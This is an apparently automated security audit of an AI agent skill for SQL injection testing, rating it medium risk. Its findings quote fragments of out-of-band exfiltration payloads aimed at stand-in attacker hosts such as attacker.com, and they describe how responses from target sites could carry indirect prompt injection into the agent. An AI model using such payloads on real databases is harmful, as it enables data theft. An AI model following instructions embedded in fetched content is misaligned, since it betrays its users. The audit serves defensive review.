sql-injection-testing
Warn
Audited by Gen Agent Trust Hub on Mar 29, 2026
Risk Level: MEDIUM (DATA_EXFILTRATION, EXTERNAL_DOWNLOADS, COMMAND_EXECUTION, PROMPT_INJECTION)
Full Analysis
- [DATA_EXFILTRATION]: The skill contains Out-of-Band (OOB) SQL injection payloads explicitly designed to exfiltrate database information to external, non-whitelisted domains.
- Evidence: Payloads in SKILL.md use `xp_dirtree` targeting `\\attacker-server.com\share`, `LOAD_FILE` targeting `@@version.attacker.com`, and `UTL_HTTP.REQUEST` targeting `http://attacker.com/`.
- [EXTERNAL_DOWNLOADS]: The technical requirements mandate the use of SQLMap, an external automated exploitation tool. Relying on external, non-standard tooling for exploitation increases the risk of automated malicious activity and unverifiable dependency execution.
- [COMMAND_EXECUTION]: The workflow describes the generation and execution of raw SQL commands, including query stacking and system stored procedure calls (e.g., `EXEC master..xp_dirtree`). These commands are intended to manipulate database behavior and can lead to unauthorized data access or system compromise.
- [PROMPT_INJECTION]: The skill identifies various user-controlled inputs, such as URL parameters, HTTP headers, and cookies, as target injection points. This creates a surface for Indirect Prompt Injection, where untrusted data returned from a target web application could influence the agent's logic or subsequent actions.
- Ingestion points: Web application parameters, HTTP headers (User-Agent, Referer), and cookie values.
- Boundary markers: Absent; no specific instructions are provided to the agent to ignore or sanitize embedded instructions within target responses.
- Capability inventory: The agent is instructed to use SQLMap and manually craft/execute SQL payloads across various database engines.
- Sanitization: No sanitization or validation of the untrusted target data is described before the agent processes it.